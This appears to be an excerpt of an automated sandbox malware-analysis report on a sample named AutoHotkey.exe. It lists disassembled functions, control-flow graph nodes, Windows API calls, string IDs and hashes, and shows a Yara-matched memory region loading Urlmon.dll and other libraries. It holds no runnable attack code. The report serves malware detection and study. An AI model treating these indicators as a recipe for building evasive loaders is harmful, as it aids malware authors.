2965->2948 2965->2960 2968->2963 2974 430bdb-430bdd 2969->2974 2975 430bfe 2969->2975 2970->2969 2973 430bce-430bd0 call 406023 2970->2973 2971->2954 2973->2969 2974->2975 2978 430bdf-430be1 2974->2978 2977 430c01-430c0d 2975->2977 2979 430c13-430c16 2977->2979 2980 430d70-430d88 2977->2980 2978->2975 2981 430be3-430bf6 call 466130 2978->2981 2979->2980 2982 430c1c-430c33 call 435990 2979->2982 2987 430e62-430e79 2980->2987 2988 430d8f-430da6 2980->2988 2981->2925 2989 430bfc 2981->2989 2996 430cc5-430ccf 2982->2996 2997 430c39-430c3f 2982->2997 2993 430e7b-430e89 call 44df90 2987->2993 2994 430e8f-430e9d 2987->2994 2991 430e22-430e32 call 44df90 2988->2991 2992 430da8-430db8 2988->2992 2989->2977 3013 435369-43537f 2991->3013 3014 430e38-430e43 2991->3014 2998 430dd4-430ddf call 401300 2992->2998 2999 430dba-430dca 2992->2999 2993->2994 2993->3013 3001 430e9f-430ea8 2994->3001 3002 430eae-430eb7 2994->3002 3003 430cd1-430cd7 2996->3003 3004 430d4a-430d4e 2996->3004 3007 430c41-430c5c call 4309f0 2997->3007 3008 430c60-430c6f call 4309f0 2997->3008 3024 430de1-430df1 2998->3024 3025 430dfb-430dfd 2998->3025 2999->2998 3001->2928 3001->3002 3011 430cd9 3003->3011 3012 430cff-430d0e call 4309f0 3003->3012 3004->2929 3004->2932 3030 430c5e 3007->3030 3028 430c73-430c75 3008->3028 3018 430ce0-430cfb call 4309f0 3011->3018 3034 430d12-430d16 3012->3034 3019 430e45-430e4f call 44e050 3014->3019 3020 430e5b-430e5d 3014->3020 3037 430cfd 3018->3037 3019->3020 3038 430e51-430e56 3019->3038 3020->2998 3024->3025 3025->2925 3031 430e03-430e06 3025->3031 3028->2930 3035 430c7b-430c7f 3028->3035 3030->3028 3031->2925 3036 430e0c-430e10 3031->3036 3039 43501b-43501f 3034->3039 3040 430d1c-430d1f 3034->3040 3035->3039 3041 430c85-430c88 3035->3041 3042 430e16-430e1d 3036->3042 3043 43503a-435042 3036->3043 3037->3034 3038->2999 3039->2925 3040->3039 3046 430d25-430d27 3040->3046 3041->3039 3047 430c8e-430c90 3041->3047 3042->2929 3043->2933 3045 435048-43505e 3043->3045 3050 430d29-430d2f 3046->3050 3051 430d3e-430d45 3046->3051 3048 430c92-430c98 3047->3048 3049 430ca7-430cb1 3047->3049 3052 430c9e-430ca2 3048->3052 3053 431b0c-431b12 3048->3053 3049->2929 3055 430cb7-430cc0 3049->3055 3050->3053 3054 430d35-430d39 3050->3054 3051->2929 3052->2929 3053->2928 3053->2932 3054->2929 3055->2929
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • __wcsicoll.LIBCMT ref: 00434EFF
                                        • Part of subcall function 0047FFB0: _vswprintf_s.LIBCMT ref: 0047FFC9
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00434F33
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock__wcsicoll_vswprintf_s
                                      • String ID: %s\%s$ahk_default$v1j
                                      • API String ID: 2168002563-383174103
                                      • Opcode ID: 771a2ceb65daeb4ccfe632aa79a1d4b741da70bfd7ee2ef69d693ce1f936a359
                                      • Instruction ID: 1bd96417fd114b07a05b0c9843a93a474b6c2919aee6f4c6e01d8f9ec8e7b48c
                                      • Opcode Fuzzy Hash: 771a2ceb65daeb4ccfe632aa79a1d4b741da70bfd7ee2ef69d693ce1f936a359
                                      • Instruction Fuzzy Hash: 87911231901240CBDB24CF64DC94B6AB7A1AB89318F14272FE455873E1D778E881CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043153B Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 353windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • _free.LIBCMT ref: 004316DF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: ClipboardCloseCountGlobalMessagePeekTickUnlock_free
                                      • String ID: Jumps cannot exit a FINALLY block.$v1j
                                      • API String ID: 3618655587-1623723626
                                      • Opcode ID: 0cf29cc3de1e8a8369243b8842714e750fc69a231f3109ef4fc94c13b0bb7e20
                                      • Instruction ID: 3c9fa57c14b40288f7ba373758355d400465fa60aefd10318e9f9a61d0133e04
                                      • Opcode Fuzzy Hash: 0cf29cc3de1e8a8369243b8842714e750fc69a231f3109ef4fc94c13b0bb7e20
                                      • Instruction Fuzzy Hash: BEE1DF71A05340CFDB24CF14D89476AB7E1AB8C314F185A6FE8858B3A1D779AC81CB5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00432E18 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 205windowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3379 432e18-432e79 call 480360 call 43b100 3384 431eab-431eaf 3379->3384 3385 432e7f-432e86 3379->3385 3389 435021-435037 3384->3389 3390 431eb5-431eb9 3384->3390 3387 432e88 3385->3387 3388 432e8d-432e9f call 483320 3385->3388 3387->3388 3388->3384 3390->3389 3392 431ebf 3390->3392 3394 431ec2 3392->3394 3395 431ec6 3394->3395 3396 431eca-431ecc 3395->3396 3397 431ed2-431ed6 3396->3397 3398 430d54 3396->3398 3400 430a54-430a5b 3397->3400 3401 43278b-432790 3397->3401 3399 430d59-430d6d 3398->3399 3402 430a8e-430aa8 GetTickCount 3400->3402 3403 430a5d-430a64 3400->3403 3406 430adb-430ae2 3402->3406 3407 430aaa-430ac2 PeekMessageW 3402->3407 3404 430a66-430a72 GlobalUnlock 3403->3404 3405 430a7c-430a89 CloseClipboard 3403->3405 3404->3405 3405->3402 3408 430ae4-430aeb 3406->3408 3409 430b0c-430b14 3406->3409 3410 430ad0-430ad6 GetTickCount 3407->3410 3411 430ac4-430acd call 4014c0 3407->3411 3408->3409 3412 430aed-430af6 3408->3412 3413 430b16 3409->3413 3414 430b2f-430b35 3409->3414 3410->3406 3411->3410 3412->3409 3416 430af8-430afd 3412->3416 3417 430b18-430b1b 3413->3417 3418 430b1d-430b23 3413->3418 3419 430b37-430b3f 3414->3419 3420 430b4d-430b54 3414->3420 3424 430b08-430b09 3416->3424 3425 430aff-430b06 3416->3425 3417->3414 3417->3418 3426 430b41-430b4a call 4014c0 3418->3426 3427 430b25 3418->3427 3419->3420 3419->3426 3422 430b56 3420->3422 3423 430b78-430b85 3420->3423 3428 430b60-430b76 call 4014c0 3422->3428 3429 430bc0-430bc7 3423->3429 3430 430b87-430bb4 GetTickCount 3423->3430 3424->3409 3425->3409 3426->3420 3427->3414 3431 430b27-430b2d 3427->3431 3428->3423 3435 430bd5-430bd9 3429->3435 3436 430bc9-430bcc 3429->3436 3430->3429 3434 430bb6 3430->3434 3431->3414 3431->3426 3434->3429 3440 430bdb-430bdd 3435->3440 3441 430bfe 3435->3441 3436->3435 3439 430bce-430bd0 call 406023 3436->3439 3439->3435 3440->3441 3444 430bdf-430be1 3440->3444 3443 430c01-430c0d 3441->3443 3445 430c13-430c16 3443->3445 3446 430d70-430d88 3443->3446 3444->3441 3447 430be3-430bf6 call 466130 3444->3447 3445->3446 3448 430c1c-430c33 call 435990 3445->3448 3453 430e62-430e79 3446->3453 3454 430d8f-430da6 3446->3454 3447->3389 3455 430bfc 3447->3455 3462 430cc5-430ccf 3448->3462 3463 430c39-430c3f 3448->3463 3459 430e7b-430e89 call 44df90 3453->3459 3460 430e8f-430e9d 3453->3460 3457 430e22-430e32 call 44df90 3454->3457 3458 430da8-430db8 3454->3458 3455->3443 3479 435369-43537f 3457->3479 3480 430e38-430e43 3457->3480 3464 430dd4-430ddf call 401300 3458->3464 3465 430dba-430dca 3458->3465 3459->3460 3459->3479 3467 430e9f-430ea8 3460->3467 3468 430eae-430eb7 3460->3468 3469 430cd1-430cd7 3462->3469 3470 430d4a-430d4e 3462->3470 3473 430c41-430c5c call 4309f0 3463->3473 3474 430c60-430c6f call 4309f0 3463->3474 3490 430de1-430df1 3464->3490 3491 430dfb-430dfd 3464->3491 3465->3464 3467->3394 3467->3468 3477 430cd9 3469->3477 3478 430cff-430d0e call 4309f0 3469->3478 3470->3395 3470->3398 3496 430c5e 3473->3496 3494 430c73-430c75 3474->3494 3484 430ce0-430cfb call 4309f0 3477->3484 3500 430d12-430d16 3478->3500 3485 430e45-430e4f call 44e050 3480->3485 3486 430e5b-430e5d 3480->3486 3503 430cfd 3484->3503 3485->3486 3504 430e51-430e56 3485->3504 3486->3464 3490->3491 3491->3389 3497 430e03-430e06 3491->3497 3494->3396 3501 430c7b-430c7f 3494->3501 3496->3494 3497->3389 3502 430e0c-430e10 3497->3502 3505 43501b-43501f 3500->3505 3506 430d1c-430d1f 3500->3506 3501->3505 3507 430c85-430c88 3501->3507 3508 430e16-430e1d 3502->3508 3509 43503a-435042 3502->3509 3503->3500 3504->3465 3505->3389 3506->3505 3512 430d25-430d27 3506->3512 3507->3505 3513 430c8e-430c90 3507->3513 3508->3395 3509->3399 3511 435048-43505e 3509->3511 3516 430d29-430d2f 3512->3516 3517 430d3e-430d45 3512->3517 3514 430c92-430c98 3513->3514 3515 430ca7-430cb1 3513->3515 3518 430c9e-430ca2 3514->3518 3519 431b0c-431b12 3514->3519 3515->3395 3521 430cb7-430cc0 3515->3521 3516->3519 3520 430d35-430d39 3516->3520 3517->3395 3518->3395 3519->3394 3519->3398 3520->3395 3521->3395
                                      APIs
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B167
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B179
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B18B
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B19D
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B1AF
                                        • Part of subcall function 0043B100: __wcsicoll.LIBCMT ref: 0043B1C1
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: __wcsicoll$CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: ERROR$UseErrorLevel$v1j
                                      • API String ID: 2063310290-790589029
                                      • Opcode ID: 5b5d3b5fd520e935eb1a03831ee7398925bf2b254f0d6b30c2d7a7a61c296efa
                                      • Instruction ID: 1c23e83de0c117d21b56a764eb93755c363dab47ebdd6569de202c22211348f6
                                      • Opcode Fuzzy Hash: 5b5d3b5fd520e935eb1a03831ee7398925bf2b254f0d6b30c2d7a7a61c296efa
                                      • Instruction Fuzzy Hash: 2C811431501240DBDB24CF64ECA5B6A77A1AB49318F14172FE8558B3E1C378E880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041E6C0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 146timeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3522 41e6c0-41e6e2 call 49a0ee 3525 41e6e4-41e6e8 3522->3525 3526 41e6e9-41e71f SetTimer 3522->3526 3527 41e721-41e726 3526->3527 3528 41e72b-41e75d GetTickCount 3526->3528 3529 41e843-41e850 3527->3529 3530 41e77b-41e7a4 GetTickCount 3528->3530 3531 41e75f-41e775 SetTimer 3528->3531 3532 41e852-41e85c 3529->3532 3533 41e89d-41e8f7 call 401000 call 483320 3529->3533 3534 41e7b0-41e7b6 3530->3534 3535 41e7a6-41e7ab call 40563f 3530->3535 3531->3530 3536 41e868-41e873 3532->3536 3537 41e85e-41e865 3532->3537 3539 41e7c5-41e7ec call 4309f0 3534->3539 3540 41e7b8-41e7c0 3534->3540 3535->3534 3542 41e875-41e87b call 49a18d 3536->3542 3543 41e87e-41e89a call 49a182 3536->3543 3537->3536 3549 41e7f1-41e806 3539->3549 3540->3539 3542->3543 3543->3533 3553 41e814-41e821 3549->3553 3554 41e808-41e80f 3549->3554 3556 41e823-41e833 KillTimer 3553->3556 3557 41e83c 3553->3557 3554->3553 3556->3557 3558 41e835 3556->3558 3557->3529 3558->3557
                                      APIs
                                      • _malloc.LIBCMT ref: 0041E6D3
                                        • Part of subcall function 0049A0EE: __FF_MSGBANNER.LIBCMT ref: 0049A107
                                        • Part of subcall function 0049A0EE: __NMSG_WRITE.LIBCMT ref: 0049A10E
                                        • Part of subcall function 0049A0EE: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,004A1668,00401234,00000001,00401234,?,0049EB7D,00000018,004CFE28,0000000C,0049EC0D), ref: 0049A133
                                      • SetTimer.USER32(0002044A,0000000E,04EF6D80,00403EB0), ref: 0041E716
                                      • _free.LIBCMT ref: 0041E876
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: AllocateHeapTimer_free_malloc
                                      • String ID: 6Dd$Auto-execute
                                      • API String ID: 92111083-2964622979
                                      • Opcode ID: 5e0751b59cbc549159088c6fc51c296ccd3178d320893de69906cb5eda0d67ec
                                      • Instruction ID: d486a3a8f4b7bb8aae1d05632f1aa42ca788c03b187c766bbc2568cac54553ae
                                      • Opcode Fuzzy Hash: 5e0751b59cbc549159088c6fc51c296ccd3178d320893de69906cb5eda0d67ec
                                      • Instruction Fuzzy Hash: 04517171602244DFD710EF69EC44B863BE5EB45304F04447BE9059F3A1D77A9890CB5D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04876655 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 29libraryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3559 4876655-48766c4 GetModuleHandleA LoadLibraryA
                                      APIs
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,0489EBBD,00000000,0489F18F,?,00000000,00000000), ref: 04876660
                                      • LoadLibraryA.KERNELBASE(Urlmon.dll,?,0489EBBD,00000000,0489F18F,?,00000000,00000000), ref: 0487668C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_4840000_AutoHotkey.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HandleLibraryLoadModule
                                      • String ID: Advapi32.dll$LoadLibraryA$Shell32.dll$Urlmon.dll$kernel32.dll$ntdll.dll$user32.dll
                                      • API String ID: 4133054770-1140356178
                                      • Opcode ID: 1fdbb4e138f6cd60da1ea982b705595acccd19097ba76bf0d2a41ee3043da791
                                      • Instruction ID: a8b5fe9f5d7154b3df09affc72747b99c058a2f5a5a73ab24934d310c8e46103
                                      • Opcode Fuzzy Hash: 1fdbb4e138f6cd60da1ea982b705595acccd19097ba76bf0d2a41ee3043da791
                                      • Instruction Fuzzy Hash: 78F0FFB0D50B10AFBB005F6094999263FE0FB086153404D65E611DA718E7B8A8A5DF53
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00434CF9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 207registrywindowclipboardCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 3581 434cf9-434d01 3582 434d23-434d44 call 41afd0 3581->3582 3583 434d03-434d08 3581->3583 3588 434d57 3582->3588 3589 434d46-434d55 3582->3589 3583->3582 3584 434d0a-434d1e call 47c620 3583->3584 3584->3582 3591 434d5d-434d6e call 47c620 3588->3591 3589->3591 3594 434d74-434d76 3591->3594 3595 431ead-431eaf 3591->3595 3594->3595 3596 434d7c-434d83 RegCloseKey 3594->3596 3597 435021-435037 3595->3597 3598 431eb5-431eb9 3595->3598 3596->3595 3598->3597 3599 431ebf 3598->3599 3600 431ec2 3599->3600 3601 431ec6 3600->3601 3602 431eca-431ecc 3601->3602 3603 431ed2-431ed6 3602->3603 3604 430d54 3602->3604 3606 430a54-430a5b 3603->3606 3607 43278b-432790 3603->3607 3605 430d59-430d6d 3604->3605 3608 430a8e-430aa8 GetTickCount 3606->3608 3609 430a5d-430a64 3606->3609 3612 430adb-430ae2 3608->3612 3613 430aaa-430ac2 PeekMessageW 3608->3613 3610 430a66-430a72 GlobalUnlock 3609->3610 3611 430a7c-430a89 CloseClipboard 3609->3611 3610->3611 3611->3608 3614 430ae4-430aeb 3612->3614 3615 430b0c-430b14 3612->3615 3616 430ad0-430ad6 GetTickCount 3613->3616 3617 430ac4-430acd call 4014c0 3613->3617 3614->3615 3618 430aed-430af6 3614->3618 3619 430b16 3615->3619 3620 430b2f-430b35 3615->3620 3616->3612 3617->3616 3618->3615 3622 430af8-430afd 3618->3622 3623 430b18-430b1b 3619->3623 3624 430b1d-430b23 3619->3624 3625 430b37-430b3f 3620->3625 3626 430b4d-430b54 3620->3626 3630 430b08-430b09 3622->3630 3631 430aff-430b06 3622->3631 3623->3620 3623->3624 3632 430b41-430b4a call 4014c0 3624->3632 3633 430b25 3624->3633 3625->3626 3625->3632 3628 430b56 3626->3628 3629 430b78-430b85 3626->3629 3634 430b60-430b76 call 4014c0 3628->3634 3635 430bc0-430bc7 3629->3635 3636 430b87-430bb4 GetTickCount 3629->3636 3630->3615 3631->3615 3632->3626 3633->3620 3637 430b27-430b2d 3633->3637 3634->3629 3641 430bd5-430bd9 3635->3641 3642 430bc9-430bcc 3635->3642 3636->3635 3640 430bb6 3636->3640 3637->3620 3637->3632 3640->3635 3646 430bdb-430bdd 3641->3646 3647 430bfe 3641->3647 3642->3641 3645 430bce-430bd0 call 406023 3642->3645 3645->3641 3646->3647 3650 430bdf-430be1 3646->3650 3649 430c01-430c0d 3647->3649 3651 430c13-430c16 3649->3651 3652 430d70-430d88 3649->3652 3650->3647 3653 430be3-430bf6 call 466130 3650->3653 3651->3652 3654 430c1c-430c33 call 435990 3651->3654 3659 430e62-430e79 3652->3659 3660 430d8f-430da6 3652->3660 3653->3597 3661 430bfc 3653->3661 3668 430cc5-430ccf 3654->3668 3669 430c39-430c3f 3654->3669 3665 430e7b-430e89 call 44df90 3659->3665 3666 430e8f-430e9d 3659->3666 3663 430e22-430e32 call 44df90 3660->3663 3664 430da8-430db8 3660->3664 3661->3649 3685 435369-43537f 3663->3685 3686 430e38-430e43 3663->3686 3670 430dd4-430ddf call 401300 3664->3670 3671 430dba-430dca 3664->3671 3665->3666 3665->3685 3673 430e9f-430ea8 3666->3673 3674 430eae-430eb7 3666->3674 3675 430cd1-430cd7 3668->3675 3676 430d4a-430d4e 3668->3676 3679 430c41-430c5c call 4309f0 3669->3679 3680 430c60-430c6f call 4309f0 3669->3680 3696 430de1-430df1 3670->3696 3697 430dfb-430dfd 3670->3697 3671->3670 3673->3600 3673->3674 3683 430cd9 3675->3683 3684 430cff-430d0e call 4309f0 3675->3684 3676->3601 3676->3604 3702 430c5e 3679->3702 3700 430c73-430c75 3680->3700 3690 430ce0-430cfb call 4309f0 3683->3690 3706 430d12-430d16 3684->3706 3691 430e45-430e4f call 44e050 3686->3691 3692 430e5b-430e5d 3686->3692 3709 430cfd 3690->3709 3691->3692 3710 430e51-430e56 3691->3710 3692->3670 3696->3697 3697->3597 3703 430e03-430e06 3697->3703 3700->3602 3707 430c7b-430c7f 3700->3707 3702->3700 3703->3597 3708 430e0c-430e10 3703->3708 3711 43501b-43501f 3706->3711 3712 430d1c-430d1f 3706->3712 3707->3711 3713 430c85-430c88 3707->3713 3714 430e16-430e1d 3708->3714 3715 43503a-435042 3708->3715 3709->3706 3710->3671 3711->3597 3712->3711 3718 430d25-430d27 3712->3718 3713->3711 3719 430c8e-430c90 3713->3719 3714->3601 3715->3605 3717 435048-43505e 3715->3717 3722 430d29-430d2f 3718->3722 3723 430d3e-430d45 3718->3723 3720 430c92-430c98 3719->3720 3721 430ca7-430cb1 3719->3721 3724 430c9e-430ca2 3720->3724 3725 431b0c-431b12 3720->3725 3721->3601 3727 430cb7-430cc0 3721->3727 3722->3725 3726 430d35-430d39 3722->3726 3723->3601 3724->3601 3725->3600 3725->3604 3726->3601 3727->3601
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • RegCloseKey.ADVAPI32(00000000), ref: 00434D7D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CloseCountTick$ClipboardGlobalMessagePeekUnlock
                                      • String ID: v1j
                                      • API String ID: 4107439908-3288809988
                                      • Opcode ID: fd23c9ca712ba4944c3425817a9188721248c35d1d7eccde78ecf171f2a8b04b
                                      • Instruction ID: b4eaf1b2afa2be916430221c66fee28cf9f2de17dabcaf2ed509ed2ee542ca81
                                      • Opcode Fuzzy Hash: fd23c9ca712ba4944c3425817a9188721248c35d1d7eccde78ecf171f2a8b04b
                                      • Instruction Fuzzy Hash: 0881E231505241DBDB24CF64ECA4B6ABBA1AB4D318F14672FE456873A1C778E880CB5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040155B Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 162windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetTimer.USER32(0002044A,00000009,0000000A), ref: 004015C4
                                      • GetTickCount.KERNEL32 ref: 004015E9
                                      • GetMessageW.USER32(?,00000000,00000000,-00000311), ref: 00401630
                                      • GetTickCount.KERNEL32 ref: 0040163B
                                      • GetFocus.USER32 ref: 004016D4
                                        • Part of subcall function 00403620: joyGetPosEx.WINMM ref: 0040364F
                                      • TranslateAcceleratorW.USER32(00000000,?,?), ref: 0040171A
                                      • IsDialogMessageW.USER32(?,?), ref: 00401CC7
                                        • Part of subcall function 004741A0: SendMessageW.USER32(00000000,00001304,00000000,00000000), ref: 004741BA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: Message$CountTick$AcceleratorDialogFocusSendTimerTranslate
                                      • String ID: 6Dd$8&
                                      • API String ID: 3283625497-313529520
                                      • Opcode ID: 5245b7eac679e0a01c879c8293627842c19f5bbd6238c481323e15d34c75a816
                                      • Instruction ID: 162076b36842e91a3c5a0614aa55ad1b7b1d21a0011bb990f07feb905fbfb45b
                                      • Opcode Fuzzy Hash: 5245b7eac679e0a01c879c8293627842c19f5bbd6238c481323e15d34c75a816
                                      • Instruction Fuzzy Hash: F751A071A083409BDB219B28C88476F77E4AB96708F04093FF586A73F1D7799C81C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430A22 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 357windowclipboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalUnlock.KERNEL32(00000000), ref: 00430A6C
                                      • CloseClipboard.USER32 ref: 00430A7C
                                      • GetTickCount.KERNEL32 ref: 00430A8E
                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00430ABA
                                      • GetTickCount.KERNEL32 ref: 00430AD0
                                      • GetTickCount.KERNEL32 ref: 00430B94
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.1664153034.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000001.00000002.1664112042.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664273844.00000000004C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664381388.00000000004D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000001.00000002.1664413515.00000000004DE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_400000_AutoHotkey.jbxd
                                      Similarity
                                      • API ID: CountTick$ClipboardCloseGlobalMessagePeekUnlock
                                      • String ID: v1j
